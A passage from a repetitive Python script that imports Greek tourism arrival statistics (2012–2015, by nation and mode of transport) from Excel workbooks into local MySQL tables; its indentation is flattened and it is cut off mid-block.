database = mysql.connector.connect(host="localhost", user="root", passwd="", database="TOURISM_DATABASE")
except:
print('Database connection failed!')
# Get the cursor, which is used to traverse the database, line by line
mycursor = database.cursor()
# Create Table
mycursor.execute(
"CREATE TABLE IF NOT EXISTS meso_2012_b(number varchar(255),nation NVARCHAR(255) PRIMARY KEY, plane varchar(255) , train varchar(255), ship varchar(255), car varchar(255), total varchar(255))")
# Create the INSERT INTO sql query
query = """INSERT INTO meso_2012_b( number , nation, plane, train, ship, car, total) VALUES (%s, %s, %s, %s, %s, %s, %s)"""
    # Loop through the sheet rows, starting at row index 76 to skip the rows above the data of interest
for r in range(76, data_sheet.nrows):
number = data_sheet.cell(r, 0).value
nation = data_sheet.cell(r, 1).value
plane = data_sheet.cell(r, 2).value
train = data_sheet.cell(r, 3).value
ship = data_sheet.cell(r, 4).value
car = data_sheet.cell(r, 5).value
total = data_sheet.cell(r, 6).value
try:
if (number == ''):
continue
# Assign values from each row
            values = (number, nation, plane, train, ship, car, total)  # `total` was missing, so the INSERT always failed
# Execute sql Query
mycursor.execute(query, values)
except:
continue
# Select Given
mycursor.execute("SELECT number, nation, plane, train, ship, car, total FROM meso_2012_b")
select_result = mycursor.fetchall()
for x in select_result:
print(x)
# Fetch only first row
# mycursor.execute("SELECT * FROM 2011_meso_a")
# result_fetch_first_row = mycursor.fetchone()
print(data_sheet.nrows)
# print(result_fetch_first_row)
# Close the cursor
mycursor.close()
# Commit the transaction
database.commit()
    # Print inserted row count
# print(mycursor.rowcount, "was inserted.")
# Close the database connection
database.close()
# Open the workbook and define the worksheet
excel_file_path: str = 'D:/Python_Project_Compilers/meso_2012_c.xls'
work_sheet = xlrd.open_workbook(excel_file_path)
# data_sheet = work_sheet.sheet_by_index(0)
data_sheet = work_sheet.sheet_by_name('ΣΕΠΤ')
# Establish a MySQL connection
try:
database = mysql.connector.connect(host="localhost", user="root", passwd="")
except:
print('Database connection failed!')
# Get the cursor, which is used to traverse the database, line by line
mycursor = database.cursor()
# First create the data base
mycursor.execute("CREATE DATABASE IF NOT EXISTS TOURISM_DATABASE")
try:
database = mysql.connector.connect(host="localhost", user="root", passwd="", database="TOURISM_DATABASE")
except:
print('Database connection failed!')
# Get the cursor, which is used to traverse the database, line by line
mycursor = database.cursor()
# Create Table
mycursor.execute(
"CREATE TABLE IF NOT EXISTS meso_2012_c(number varchar(255),nation NVARCHAR(255) PRIMARY KEY, plane varchar(255) , train varchar(255), ship varchar(255), car varchar(255), total varchar(255))")
# Create the INSERT INTO sql query
query = """INSERT INTO meso_2012_c( number , nation, plane, train, ship, car, total) VALUES (%s, %s, %s, %s, %s, %s, %s)"""
    # Loop through the sheet rows, starting at row index 76 to skip the rows above the data of interest
for r in range(76, data_sheet.nrows):
number = data_sheet.cell(r, 0).value
nation = data_sheet.cell(r, 1).value
plane = data_sheet.cell(r, 2).value
train = data_sheet.cell(r, 3).value
ship = data_sheet.cell(r, 4).value
car = data_sheet.cell(r, 5).value
total = data_sheet.cell(r, 6).value
try:
if (number == ''):
continue
# Assign values from each row
values = (number, nation, plane, train, ship, car, total)
# Execute sql Query
mycursor.execute(query, values)
except:
continue
# Select Given
mycursor.execute("SELECT number, nation, plane, train, ship, car, total FROM meso_2012_c")
select_result = mycursor.fetchall()
for x in select_result:
print(x)
# Fetch only first row
# mycursor.execute("SELECT * FROM 2011_meso_a")
# result_fetch_first_row = mycursor.fetchone()
print(data_sheet.nrows)
# print(result_fetch_first_row)
# Close the cursor
mycursor.close()
# Commit the transaction
database.commit()
    # Print inserted row count
# print(mycursor.rowcount, "was inserted.")
# Close the database connection
database.close()
# Open the workbook and define the worksheet
excel_file_path: str = 'D:/Python_Project_Compilers/meso_2012_d.xls'
work_sheet = xlrd.open_workbook(excel_file_path)
# data_sheet = work_sheet.sheet_by_index(0)
data_sheet = work_sheet.sheet_by_name('ΔΕΚ')
# Establish a MySQL connection
try:
database = mysql.connector.connect(host="localhost", user="root", passwd="")
except:
print('Database connection failed!')
# Get the cursor, which is used to traverse the database, line by line
mycursor = database.cursor()
# First create the data base
mycursor.execute("CREATE DATABASE IF NOT EXISTS TOURISM_DATABASE")
try:
database = mysql.connector.connect(host="localhost", user="root", passwd="", database="TOURISM_DATABASE")
except:
print('Database connection failed!')
# Get the cursor, which is used to traverse the database, line by line
mycursor = database.cursor()
# Create Table
mycursor.execute(
"CREATE TABLE IF NOT EXISTS meso_2012_d(number varchar(255),nation NVARCHAR(255) PRIMARY KEY, plane varchar(255) , train varchar(255), ship varchar(255), car varchar(255), total varchar(255))")
# Create the INSERT INTO sql query
query = """INSERT INTO meso_2012_d( number , nation, plane, train, ship, car, total ) VALUES (%s, %s, %s, %s, %s, %s, %s)"""
    # Loop through the sheet rows, starting at row index 76 to skip the rows above the data of interest
for r in range(76, data_sheet.nrows):
number = data_sheet.cell(r, 0).value
nation = data_sheet.cell(r, 1).value
plane = data_sheet.cell(r, 2).value
train = data_sheet.cell(r, 3).value
ship = data_sheet.cell(r, 4).value
car = data_sheet.cell(r, 5).value
total = data_sheet.cell(r, 6).value
try:
if (number == ''):
continue
# Assign values from each row
values = (number, nation, plane, train, ship, car, total)
# Execute sql Query
mycursor.execute(query, values)
except:
continue
# Select Given
mycursor.execute("SELECT number, nation, plane, train, ship, car, total FROM meso_2012_d")
select_result = mycursor.fetchall()
for x in select_result:
print(x)
# Fetch only first row
# mycursor.execute("SELECT * FROM 2011_meso_a")
# result_fetch_first_row = mycursor.fetchone()
print(data_sheet.nrows)
# print(result_fetch_first_row)
# Close the cursor
mycursor.close()
# Commit the transaction
database.commit()
    # Print inserted row count
# print(mycursor.rowcount, "was inserted.")
# Close the database connection
database.close()
# Open the workbook and define the worksheet
excel_file_path: str = 'D:/Python_Project_Compilers/meso_2013_a.xls'
work_sheet = xlrd.open_workbook(excel_file_path)
# data_sheet = work_sheet.sheet_by_index(0)
data_sheet = work_sheet.sheet_by_name('ΜΑΡ')
# Establish a MySQL connection
try:
database = mysql.connector.connect(host="localhost", user="root", passwd="")
except:
print('Database connection failed!')
# Get the cursor, which is used to traverse the database, line by line
mycursor = database.cursor()
# First create the data base
mycursor.execute("CREATE DATABASE IF NOT EXISTS TOURISM_DATABASE")
try:
database = mysql.connector.connect(host="localhost", user="root", passwd="", database="TOURISM_DATABASE")
except:
print('Database connection failed!')
# Get the cursor, which is used to traverse the database, line by line
mycursor = database.cursor()
# Create Table
mycursor.execute(
"CREATE TABLE IF NOT EXISTS meso_2013_a(number varchar(255),nation NVARCHAR(255) PRIMARY KEY, plane varchar(255) , train varchar(255), ship varchar(255), car varchar(255), total varchar(255))")
# Create the INSERT INTO sql query
query = """INSERT INTO meso_2013_a( number , nation, plane, train, ship, car, total) VALUES (%s, %s, %s, %s, %s, %s, %s)"""
    # Loop through the sheet rows, starting at row index 76 to skip the rows above the data of interest
for r in range(76, data_sheet.nrows):
number = data_sheet.cell(r, 0).value
nation = data_sheet.cell(r, 1).value
plane = data_sheet.cell(r, 2).value
train = data_sheet.cell(r, 3).value
ship = data_sheet.cell(r, 4).value
car = data_sheet.cell(r, 5).value
total = data_sheet.cell(r, 6).value
try:
if (number == ''):
continue
# Assign values from each row
            values = (number, nation, plane, train, ship, car, total)  # `total` was missing, so the INSERT always failed
# Execute sql Query
mycursor.execute(query, values)
except:
continue
# Select Given
mycursor.execute("SELECT number, nation, plane, train, ship, car, total FROM meso_2013_a")
select_result = mycursor.fetchall()
for x in select_result:
print(x)
# Fetch only first row
# mycursor.execute("SELECT * FROM 2011_meso_a")
# result_fetch_first_row = mycursor.fetchone()
print(data_sheet.nrows)
# print(result_fetch_first_row)
# Close the cursor
mycursor.close()
# Commit the transaction
database.commit()
    # Print inserted row count
# print(mycursor.rowcount, "was inserted.")
# Close the database connection
database.close()
# Open the workbook and define the worksheet
excel_file_path: str = 'D:/Python_Project_Compilers/meso_2013_b.xls'
work_sheet = xlrd.open_workbook(excel_file_path)
# data_sheet = work_sheet.sheet_by_index(0)
data_sheet = work_sheet.sheet_by_name('ΙΟΥΝ')
# Establish a MySQL connection
try:
database = mysql.connector.connect(host="localhost", user="root", passwd="")
except:
print('Database connection failed!')
# Get the cursor, which is used to traverse the database, line by line
mycursor = database.cursor()
# First create the data base
mycursor.execute("CREATE DATABASE IF NOT EXISTS TOURISM_DATABASE")
try:
database = mysql.connector.connect(host="localhost", user="root", passwd="", database="TOURISM_DATABASE")
except:
print('Database connection failed!')
# Get the cursor, which is used to traverse the database, line by line
mycursor = database.cursor()
# Create Table
mycursor.execute(
"CREATE TABLE IF NOT EXISTS meso_2013_b(number varchar(255),nation NVARCHAR(255) PRIMARY KEY, plane varchar(255) , train varchar(255), ship varchar(255), car varchar(255), total varchar(255))")
# Create the INSERT INTO sql query
query = """INSERT INTO meso_2013_b( number , nation, plane, train, ship, car, total) VALUES (%s, %s, %s, %s, %s, %s, %s)"""
    # Loop through the sheet rows, starting at row index 76 to skip the rows above the data of interest
for r in range(76, data_sheet.nrows):
number = data_sheet.cell(r, 0).value
nation = data_sheet.cell(r, 1).value
plane = data_sheet.cell(r, 2).value
train = data_sheet.cell(r, 3).value
ship = data_sheet.cell(r, 4).value
car = data_sheet.cell(r, 5).value
total = data_sheet.cell(r, 6).value
try:
if (number == ''):
continue
# Assign values from each row
            values = (number, nation, plane, train, ship, car, total)  # `total` was missing, so the INSERT always failed
# Execute sql Query
mycursor.execute(query, values)
except:
continue
# Select Given
mycursor.execute("SELECT number, nation, plane, train, ship, car, total FROM meso_2013_b")
select_result = mycursor.fetchall()
for x in select_result:
print(x)
# Fetch only first row
# mycursor.execute("SELECT * FROM 2011_meso_a")
# result_fetch_first_row = mycursor.fetchone()
print(data_sheet.nrows)
# print(result_fetch_first_row)
# Close the cursor
mycursor.close()
# Commit the transaction
database.commit()
    # Print inserted row count
# print(mycursor.rowcount, "was inserted.")
# Close the database connection
database.close()
# Open the workbook and define the worksheet
excel_file_path: str = 'D:/Python_Project_Compilers/meso_2013_c.xls'
work_sheet = xlrd.open_workbook(excel_file_path)
# data_sheet = work_sheet.sheet_by_index(0)
data_sheet = work_sheet.sheet_by_name('ΣΕΠ')
# Establish a MySQL connection
try:
database = mysql.connector.connect(host="localhost", user="root", passwd="")
except:
print('Database connection failed!')
# Get the cursor, which is used to traverse the database, line by line
mycursor = database.cursor()
# First create the data base
mycursor.execute("CREATE DATABASE IF NOT EXISTS TOURISM_DATABASE")
try:
database = mysql.connector.connect(host="localhost", user="root", passwd="", database="TOURISM_DATABASE")
except:
print('Database connection failed!')
# Get the cursor, which is used to traverse the database, line by line
mycursor = database.cursor()
# Create Table
mycursor.execute(
"CREATE TABLE IF NOT EXISTS meso_2013_c(number varchar(255),nation NVARCHAR(255) PRIMARY KEY, plane varchar(255) , train varchar(255), ship varchar(255), car varchar(255), total varchar(255))")
# Create the INSERT INTO sql query
query = """INSERT INTO meso_2013_c( number , nation, plane, train, ship, car, total) VALUES (%s, %s, %s, %s, %s, %s, %s)"""
    # Loop through the sheet rows, starting at row index 76 to skip the rows above the data of interest
for r in range(76, data_sheet.nrows):
number = data_sheet.cell(r, 0).value
nation = data_sheet.cell(r, 1).value
plane = data_sheet.cell(r, 2).value
train = data_sheet.cell(r, 3).value
ship = data_sheet.cell(r, 4).value
car = data_sheet.cell(r, 5).value
total = data_sheet.cell(r, 6).value
try:
if (number == ''):
continue
# Assign values from each row
values = (number, nation, plane, train, ship, car, total)
# Execute sql Query
mycursor.execute(query, values)
except:
continue
# Select Given
mycursor.execute("SELECT number, nation, plane, train, ship, car, total FROM meso_2013_c")
select_result = mycursor.fetchall()
for x in select_result:
print(x)
# Fetch only first row
# mycursor.execute("SELECT * FROM 2011_meso_a")
# result_fetch_first_row = mycursor.fetchone()
print(data_sheet.nrows)
# print(result_fetch_first_row)
# Close the cursor
mycursor.close()
# Commit the transaction
database.commit()
    # Print inserted row count
# print(mycursor.rowcount, "was inserted.")
# Close the database connection
database.close()
# Open the workbook and define the worksheet
excel_file_path: str = 'D:/Python_Project_Compilers/meso_2013_d.xls'
work_sheet = xlrd.open_workbook(excel_file_path)
# data_sheet = work_sheet.sheet_by_index(0)
data_sheet = work_sheet.sheet_by_name('ΔΕΚ')
# Establish a MySQL connection
try:
database = mysql.connector.connect(host="localhost", user="root", passwd="")
except:
print('Database connection failed!')
# Get the cursor, which is used to traverse the database, line by line
mycursor = database.cursor()
# First create the data base
mycursor.execute("CREATE DATABASE IF NOT EXISTS TOURISM_DATABASE")
try:
database = mysql.connector.connect(host="localhost", user="root", passwd="", database="TOURISM_DATABASE")
except:
print('Database connection failed!')
# Get the cursor, which is used to traverse the database, line by line
mycursor = database.cursor()
# Create Table
mycursor.execute(
"CREATE TABLE IF NOT EXISTS meso_2013_d(number varchar(255),nation NVARCHAR(255) PRIMARY KEY, plane varchar(255) , train varchar(255), ship varchar(255), car varchar(255), total varchar(255))")
# Create the INSERT INTO sql query
query = """INSERT INTO meso_2013_d( number , nation, plane, train, ship, car, total) VALUES (%s, %s, %s, %s, %s, %s, %s)"""
    # Loop through the sheet rows, starting at row index 76 to skip the rows above the data of interest
for r in range(76, data_sheet.nrows):
number = data_sheet.cell(r, 0).value
nation = data_sheet.cell(r, 1).value
plane = data_sheet.cell(r, 2).value
train = data_sheet.cell(r, 3).value
ship = data_sheet.cell(r, 4).value
car = data_sheet.cell(r, 5).value
total = data_sheet.cell(r, 6).value
try:
if (number == ''):
continue
# Assign values from each row
values = (number, nation, plane, train, ship, car, total)
# Execute sql Query
mycursor.execute(query, values)
except:
continue
# Select the inserted columns to verify the load
mycursor.execute("SELECT number, nation, plane, train, ship, car, total FROM meso_2013_d")
select_result = mycursor.fetchall()
for x in select_result:
print(x)
# Fetch only first row
# mycursor.execute("SELECT * FROM 2011_meso_a")
# result_fetch_first_row = mycursor.fetchone()
print(data_sheet.nrows)
# print(result_fetch_first_row)
# Close the cursor
mycursor.close()
# Commit the transaction
database.commit()
# Print the inserted row count
# print(mycursor.rowcount, "was inserted.")
# Close the database connection
database.close()
# Open the workbook and define the worksheet
excel_file_path: str = 'D:/Python_Project_Compilers/meso_2014_a.xls'
work_sheet = xlrd.open_workbook(excel_file_path)
# data_sheet = work_sheet.sheet_by_index(0)
data_sheet = work_sheet.sheet_by_name('ΜΑΡ')
# Establish a MySQL connection
try:
database = mysql.connector.connect(host="localhost", user="root", passwd="")
except:
print('Database connection failed!')
# Get the cursor, which is used to traverse the database, line by line
mycursor = database.cursor()
# First create the database
mycursor.execute("CREATE DATABASE IF NOT EXISTS TOURISM_DATABASE")
try:
database = mysql.connector.connect(host="localhost", user="root", passwd="", database="TOURISM_DATABASE")
except:
print('Database connection failed!')
# Get the cursor, which is used to traverse the database, line by line
mycursor = database.cursor()
# Create Table
mycursor.execute(
"CREATE TABLE IF NOT EXISTS meso_2014_a(number varchar(255),nation NVARCHAR(255) PRIMARY KEY, plane varchar(255) , train varchar(255), ship varchar(255), car varchar(255), total varchar(255))")
# Create the INSERT INTO sql query
query = """INSERT INTO meso_2014_a( number , nation, plane, train, ship, car, total) VALUES (%s, %s, %s, %s, %s, %s, %s)"""
# Loop through each row in the XLS file, starting at row index 76 to skip the header rows
for r in range(76, data_sheet.nrows):
number = data_sheet.cell(r, 0).value
nation = data_sheet.cell(r, 1).value
plane = data_sheet.cell(r, 2).value
train = data_sheet.cell(r, 3).value
ship = data_sheet.cell(r, 4).value
car = data_sheet.cell(r, 5).value
total = data_sheet.cell(r, 6).value
try:
if (number == ''):
continue
# Assign values from each row
values = (number, nation, plane, train, ship, car, total)
# Execute sql Query
mycursor.execute(query, values)
except:
continue
# Select the inserted columns to verify the load
mycursor.execute("SELECT number, nation, plane, train, ship, car, total FROM meso_2014_a")
select_result = mycursor.fetchall()
for x in select_result:
print(x)
# Fetch only first row
# mycursor.execute("SELECT * FROM 2011_meso_a")
# result_fetch_first_row = mycursor.fetchone()
print(data_sheet.nrows)
# print(result_fetch_first_row)
# Close the cursor
mycursor.close()
# Commit the transaction
database.commit()
# Print the inserted row count
# print(mycursor.rowcount, "was inserted.")
# Close the database connection
database.close()
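# --- Editor's note: a hedged sketch, not part of the original script ---
# Each block here executes the INSERT one row at a time inside a bare
# try/except. The same load could be batched with cursor.executemany, as
# sketched below; insert_rows is a hypothetical helper that is never called
# in this script, and it assumes the 7-column xlrd sheet layout used above.
def insert_rows(cursor, insert_query, sheet, start_row=76):
    """Collect non-empty rows from an xlrd sheet and insert them in one batch."""
    rows = []
    for row_idx in range(start_row, sheet.nrows):
        row = tuple(sheet.cell(row_idx, col).value for col in range(7))
        if row[0] == '':
            # skip rows without a number, mirroring the loops in this script
            continue
        rows.append(row)
    if rows:
        cursor.executemany(insert_query, rows)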
# Open the workbook and define the worksheet
excel_file_path: str = 'D:/Python_Project_Compilers/meso_2014_b.xls'
work_sheet = xlrd.open_workbook(excel_file_path)
# data_sheet = work_sheet.sheet_by_index(0)
data_sheet = work_sheet.sheet_by_name('ΙΟΥΝ')
# Establish a MySQL connection
try:
database = mysql.connector.connect(host="localhost", user="root", passwd="")
except:
print('Database connection failed!')
# Get the cursor, which is used to traverse the database, line by line
mycursor = database.cursor()
# First create the database
mycursor.execute("CREATE DATABASE IF NOT EXISTS TOURISM_DATABASE")
try:
database = mysql.connector.connect(host="localhost", user="root", passwd="", database="TOURISM_DATABASE")
except:
print('Database connection failed!')
# Get the cursor, which is used to traverse the database, line by line
mycursor = database.cursor()
# Create Table
mycursor.execute(
"CREATE TABLE IF NOT EXISTS meso_2014_b(number varchar(255),nation NVARCHAR(255) PRIMARY KEY, plane varchar(255) , train varchar(255), ship varchar(255), car varchar(255), total varchar(255))")
# Create the INSERT INTO sql query
query = """INSERT INTO meso_2014_b( number , nation, plane, train, ship, car, total) VALUES (%s, %s, %s, %s, %s, %s, %s)"""
# Loop through each row in the XLS file, starting at row index 76 to skip the header rows
for r in range(76, data_sheet.nrows):
number = data_sheet.cell(r, 0).value
nation = data_sheet.cell(r, 1).value
plane = data_sheet.cell(r, 2).value
train = data_sheet.cell(r, 3).value
ship = data_sheet.cell(r, 4).value
car = data_sheet.cell(r, 5).value
total = data_sheet.cell(r, 6).value
try:
if (number == ''):
continue
# Assign values from each row
values = (number, nation, plane, train, ship, car, total)
# Execute sql Query
mycursor.execute(query, values)
except:
continue
# Select the inserted columns to verify the load
mycursor.execute("SELECT number, nation, plane, train, ship, car, total FROM meso_2014_b")
select_result = mycursor.fetchall()
for x in select_result:
print(x)
# Fetch only first row
# mycursor.execute("SELECT * FROM 2011_meso_a")
# result_fetch_first_row = mycursor.fetchone()
print(data_sheet.nrows)
# print(result_fetch_first_row)
# Close the cursor
mycursor.close()
# Commit the transaction
database.commit()
# Print the inserted row count
# print(mycursor.rowcount, "was inserted.")
# Close the database connection
database.close()
# Open the workbook and define the worksheet
excel_file_path: str = 'D:/Python_Project_Compilers/meso_2014_c.xls'
work_sheet = xlrd.open_workbook(excel_file_path)
# data_sheet = work_sheet.sheet_by_index(0)
data_sheet = work_sheet.sheet_by_name('ΣΕΠΤ')
# Establish a MySQL connection
try:
database = mysql.connector.connect(host="localhost", user="root", passwd="")
except:
print('Database connection failed!')
# Get the cursor, which is used to traverse the database, line by line
mycursor = database.cursor()
# First create the database
mycursor.execute("CREATE DATABASE IF NOT EXISTS TOURISM_DATABASE")
try:
database = mysql.connector.connect(host="localhost", user="root", passwd="", database="TOURISM_DATABASE")
except:
print('Database connection failed!')
# Get the cursor, which is used to traverse the database, line by line
mycursor = database.cursor()
# Create Table
mycursor.execute(
"CREATE TABLE IF NOT EXISTS meso_2014_c(number varchar(255),nation NVARCHAR(255) PRIMARY KEY, plane varchar(255) , train varchar(255), ship varchar(255), car varchar(255), total varchar(255))")
# Create the INSERT INTO sql query
query = """INSERT INTO meso_2014_c( number , nation, plane, train, ship, car, total) VALUES (%s, %s, %s, %s, %s, %s, %s)"""
# Loop through each row in the XLS file, starting at row index 76 to skip the header rows
for r in range(76, data_sheet.nrows):
number = data_sheet.cell(r, 0).value
nation = data_sheet.cell(r, 1).value
plane = data_sheet.cell(r, 2).value
train = data_sheet.cell(r, 3).value
ship = data_sheet.cell(r, 4).value
car = data_sheet.cell(r, 5).value
total = data_sheet.cell(r, 6).value
try:
if (number == ''):
continue
# Assign values from each row
        values = (number, nation, plane, train, ship, car, total)
# Execute sql Query
mycursor.execute(query, values)
except:
continue
# Select the inserted columns to verify the load
mycursor.execute("SELECT number, nation, plane, train, ship, car, total FROM meso_2014_c")
select_result = mycursor.fetchall()
for x in select_result:
print(x)
# Fetch only first row
# mycursor.execute("SELECT * FROM 2011_meso_a")
# result_fetch_first_row = mycursor.fetchone()
print(data_sheet.nrows)
# print(result_fetch_first_row)
# Close the cursor
mycursor.close()
# Commit the transaction
database.commit()
# Print the inserted row count
# print(mycursor.rowcount, "was inserted.")
# Close the database connection
database.close()
# Open the workbook and define the worksheet
excel_file_path: str = 'D:/Python_Project_Compilers/meso_2014_d.xls'
work_sheet = xlrd.open_workbook(excel_file_path)
# data_sheet = work_sheet.sheet_by_index(0)
data_sheet = work_sheet.sheet_by_name('ΔΕΚ')
# Establish a MySQL connection
try:
database = mysql.connector.connect(host="localhost", user="root", passwd="")
except:
print('Database connection failed!')
# Get the cursor, which is used to traverse the database, line by line
mycursor = database.cursor()
# First create the database
mycursor.execute("CREATE DATABASE IF NOT EXISTS TOURISM_DATABASE")
try:
database = mysql.connector.connect(host="localhost", user="root", passwd="", database="TOURISM_DATABASE")
except:
print('Database connection failed!')
# Get the cursor, which is used to traverse the database, line by line
mycursor = database.cursor()
# Create Table
mycursor.execute(
"CREATE TABLE IF NOT EXISTS meso_2014_d(number varchar(255),nation NVARCHAR(255) PRIMARY KEY, plane varchar(255) , train varchar(255), ship varchar(255), car varchar(255), total varchar(255))")
# Create the INSERT INTO sql query
query = """INSERT INTO meso_2014_d( number , nation, plane, train, ship, car, total) VALUES (%s, %s, %s, %s, %s, %s, %s)"""
# Loop through each row in the XLS file, starting at row index 76 to skip the header rows
for r in range(76, data_sheet.nrows):
number = data_sheet.cell(r, 0).value
nation = data_sheet.cell(r, 1).value
plane = data_sheet.cell(r, 2).value
train = data_sheet.cell(r, 3).value
ship = data_sheet.cell(r, 4).value
car = data_sheet.cell(r, 5).value
total = data_sheet.cell(r, 6).value
try:
if (number == ''):
continue
# Assign values from each row
values = (number, nation, plane, train, ship, car, total)
# Execute sql Query
mycursor.execute(query, values)
except:
continue
# Select the inserted columns to verify the load
mycursor.execute("SELECT number, nation, plane, train, ship, car, total FROM meso_2014_d")
select_result = mycursor.fetchall()
for x in select_result:
print(x)
# Fetch only first row
# mycursor.execute("SELECT * FROM 2011_meso_a")
# result_fetch_first_row = mycursor.fetchone()
print(data_sheet.nrows)
# print(result_fetch_first_row)
# Close the cursor
mycursor.close()
# Commit the transaction
database.commit()
# Print the inserted row count
# print(mycursor.rowcount, "was inserted.")
# Close the database connection
database.close()
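# --- Editor's note: a hedged sketch, not part of the original script ---
# The blocks in this script repeat the same open-sheet / create-table /
# insert / select sequence, varying only the file path, sheet name and table
# name. A minimal refactoring sketch follows; load_sheet_to_table is a
# hypothetical helper (never called here), and the table name must be a
# trusted constant because SQL identifiers cannot be passed as parameters.
def load_sheet_to_table(xls_path, sheet_name, table_name):
    work_sheet = xlrd.open_workbook(xls_path)
    data_sheet = work_sheet.sheet_by_name(sheet_name)
    database = mysql.connector.connect(host="localhost", user="root",
                                       passwd="", database="TOURISM_DATABASE")
    mycursor = database.cursor()
    mycursor.execute(
        "CREATE TABLE IF NOT EXISTS {}(number varchar(255), "
        "nation NVARCHAR(255) PRIMARY KEY, plane varchar(255), "
        "train varchar(255), ship varchar(255), car varchar(255), "
        "total varchar(255))".format(table_name))
    query = ("INSERT INTO {}(number, nation, plane, train, ship, car, total) "
             "VALUES (%s, %s, %s, %s, %s, %s, %s)".format(table_name))
    for r in range(76, data_sheet.nrows):
        values = tuple(data_sheet.cell(r, c).value for c in range(7))
        if values[0] == '':
            continue
        try:
            mycursor.execute(query, values)
        except mysql.connector.Error:
            continue
    mycursor.close()
    database.commit()
    database.close()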
# Open the workbook and define the worksheet
excel_file_path: str = 'D:/Python_Project_Compilers/meso_2015_a.xls'
work_sheet = xlrd.open_workbook(excel_file_path)
# data_sheet = work_sheet.sheet_by_index(0)
data_sheet = work_sheet.sheet_by_name('ΜΑΡ')
# Establish a MySQL connection
try:
database = mysql.connector.connect(host="localhost", user="root", passwd="")
except:
print('Database connection failed!')
# Get the cursor, which is used to traverse the database, line by line
mycursor = database.cursor()
# First create the database
mycursor.execute("CREATE DATABASE IF NOT EXISTS TOURISM_DATABASE")
try:
database = mysql.connector.connect(host="localhost", user="root", passwd="", database="TOURISM_DATABASE")
except:
print('Database connection failed!')
# Get the cursor, which is used to traverse the database, line by line
mycursor = database.cursor()
# Create Table
mycursor.execute(
"CREATE TABLE IF NOT EXISTS meso_2015_a(number varchar(255),nation NVARCHAR(255) PRIMARY KEY, plane varchar(255) , train varchar(255), ship varchar(255), car varchar(255), total varchar(255))")
# Create the INSERT INTO sql query
query = """INSERT INTO meso_2015_a( number , nation, plane, train, ship, car, total) VALUES (%s, %s, %s, %s, %s, %s, %s)"""
# Loop through each row in the XLS file, starting at row index 76 to skip the header rows
for r in range(76, data_sheet.nrows):
number = data_sheet.cell(r, 0).value
nation = data_sheet.cell(r, 1).value
plane = data_sheet.cell(r, 2).value
train = data_sheet.cell(r, 3).value
ship = data_sheet.cell(r, 4).value
car = data_sheet.cell(r, 5).value
total = data_sheet.cell(r, 6).value
try:
if (number == ''):
continue
# Assign values from each row
values = (number, nation, plane, train, ship, car, total)
# Execute sql Query
mycursor.execute(query, values)
except:
continue
# Select the inserted columns to verify the load
mycursor.execute("SELECT number, nation, plane, train, ship, car, total FROM meso_2015_a")
select_result = mycursor.fetchall()
for x in select_result:
print(x)
# Fetch only first row
# mycursor.execute("SELECT * FROM 2011_meso_a")
# result_fetch_first_row = mycursor.fetchone()
print(data_sheet.nrows)
# print(result_fetch_first_row)
# Close the cursor
mycursor.close()
# Commit the transaction
database.commit()
# Print the inserted row count
# print(mycursor.rowcount, "was inserted.")
# Close the database connection
database.close()
# Open the workbook and define the worksheet
excel_file_path: str = 'D:/Python_Project_Compilers/meso_2015_b.xls'
work_sheet = xlrd.open_workbook(excel_file_path)
# data_sheet = work_sheet.sheet_by_index(0)
data_sheet = work_sheet.sheet_by_name('ΜΑΡ')
# Establish a MySQL connection
try:
database = mysql.connector.connect(host="localhost", user="root", passwd="")
except:
print('Database connection failed!')
# Get the cursor, which is used to traverse the database, line by line
mycursor = database.cursor()
# First create the database
mycursor.execute("CREATE DATABASE IF NOT EXISTS TOURISM_DATABASE")
try:
database = mysql.connector.connect(host="localhost", user="root", passwd="", database="TOURISM_DATABASE")
except:
print('Database connection failed!')
# Get the cursor, which is used to traverse the database, line by line
mycursor = database.cursor()
# Create Table
mycursor.execute(
"CREATE TABLE IF NOT EXISTS meso_2015_b(number varchar(255),nation NVARCHAR(255) PRIMARY KEY, plane varchar(255) , train varchar(255), ship varchar(255), car varchar(255), total varchar(255))")
# Create the INSERT INTO sql query
query = """INSERT INTO meso_2015_b( number , nation, plane, train, ship, car, total) VALUES (%s, %s, %s, %s, %s, %s, %s)"""
# Loop through each row in the XLS file, starting at row index 76 to skip the header rows
for r in range(76, data_sheet.nrows):
number = data_sheet.cell(r, 0).value
nation = data_sheet.cell(r, 1).value
plane = data_sheet.cell(r, 2).value
train = data_sheet.cell(r, 3).value
ship = data_sheet.cell(r, 4).value
car = data_sheet.cell(r, 5).value
total = data_sheet.cell(r, 6).value
try:
if (number == ''):
continue
# Assign values from each row
values = (number, nation, plane, train, ship, car, total)
# Execute sql Query
mycursor.execute(query, values)
except:
continue
# Select the inserted columns to verify the load
mycursor.execute("SELECT number, nation, plane, train, ship, car, total FROM meso_2015_b")
select_result = mycursor.fetchall()
for x in select_result:
print(x)
# Fetch only first row
# mycursor.execute("SELECT * FROM 2011_meso_a")
# result_fetch_first_row = mycursor.fetchone()
print(data_sheet.nrows)
# print(result_fetch_first_row)
# Close the cursor
mycursor.close()
# Commit the transaction
database.commit()
# Print the inserted row count
# print(mycursor.rowcount, "was inserted.")
# Close the database connection
database.close()
# Open the workbook and define the worksheet
excel_file_path: str = 'D:/Python_Project_Compilers/meso_2015_c.xls'
work_sheet = xlrd.open_workbook(excel_file_path)
# data_sheet = work_sheet.sheet_by_index(0)
data_sheet = work_sheet.sheet_by_name('ΣΕΠΤ')
# Establish a MySQL connection
try:
database = mysql.connector.connect(host="localhost", user="root", passwd="")
except:
print('Database connection failed!')
# Get the cursor, which is used to traverse the database, line by line
mycursor = database.cursor()
# First create the database
mycursor.execute("CREATE DATABASE IF NOT EXISTS TOURISM_DATABASE")
try:
database = mysql.connector.connect(host="localhost", user="root", passwd="", database="TOURISM_DATABASE")
except:
print('Database connection failed!')
# Get the cursor, which is used to traverse the database, line by line
mycursor = database.cursor()
# Create Table
mycursor.execute(
"CREATE TABLE IF NOT EXISTS meso_2015_c(number varchar(255),nation NVARCHAR(255) PRIMARY KEY, plane varchar(255) , train varchar(255), ship varchar(255), car varchar(255), total varchar(255))")
# Create the INSERT INTO sql query
query = """INSERT INTO meso_2015_c( number , nation, plane, train, ship, car, total) VALUES (%s, %s, %s, %s, %s, %s, %s)"""
# Loop through each row in the XLS file, starting at row index 76 to skip the header rows
for r in range(76, data_sheet.nrows):
number = data_sheet.cell(r, 0).value
nation = data_sheet.cell(r, 1).value
plane = data_sheet.cell(r, 2).value
train = data_sheet.cell(r, 3).value
ship = data_sheet.cell(r, 4).value
car = data_sheet.cell(r, 5).value
total = data_sheet.cell(r, 6).value
try:
if (number == ''):
continue
# Assign values from each row
